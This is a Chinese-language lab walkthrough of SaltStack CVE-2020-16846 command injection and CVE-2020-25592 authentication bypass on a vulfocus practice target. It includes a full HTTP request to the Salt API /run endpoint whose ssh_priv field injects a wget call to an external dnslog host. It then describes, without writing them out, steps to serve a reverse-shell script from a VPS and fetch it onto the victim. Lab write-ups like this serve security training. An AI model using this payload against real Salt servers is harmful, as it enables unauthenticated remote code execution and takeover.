SaltStack是一个分布式运维系统,在互联网场景中被广泛应用,有以下两个主要功能: 1、配置管理系统,能够将远程节点维护在一个预定义的状态(例如,确保安装特定的软件包并运行特定的服务) 2、分布式远程执行系统,用于在远程节点上单独或通过任意选择标准来执行命令和查询数据
CVE-2020-16846: 命令注入漏洞 未经过身份验证的攻击者通过发送特制请求包,可通过Salt API注入ssh连接命令导致命令执行。
CVE-2020-25592: 验证绕过漏洞 Salt 在验证eauth凭据和访问控制列表ACL时存在一处验证绕过漏洞。未经过身份验证的远程攻击者通过发送特制的请求包,可以通过salt-api绕过身份验证,并使用salt ssh连接目标服务器。结合CVE-2020-16846能造成命令执行。
vulfocus CVE-2020-16846
1、打开靶场界面如下。

2、发送payload,请求dnslog服务器,请求成功。
POST /run HTTP/1.1
Host: 106.75.78.245:61421
Cookie: ADMINCONSOLESESSION=5NDskzyQc_Nt-hUMrjTr_FS2odUjKesfUAvDKlmSyNOpon2og8kg!-1609905263
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 97
token=123123&client=ssh&tgt=*&fun=a&roster=flyoung&ssh_priv=aaa|wget%20http://ajqpwt.dnslog.cn%3b

注意:
3、在vps服务器上新建一个bash文件,内容为反弹shell的命令。

4、利用python搭建一个服务器。

5、利用wget将bash脚本下载到受害者服务器。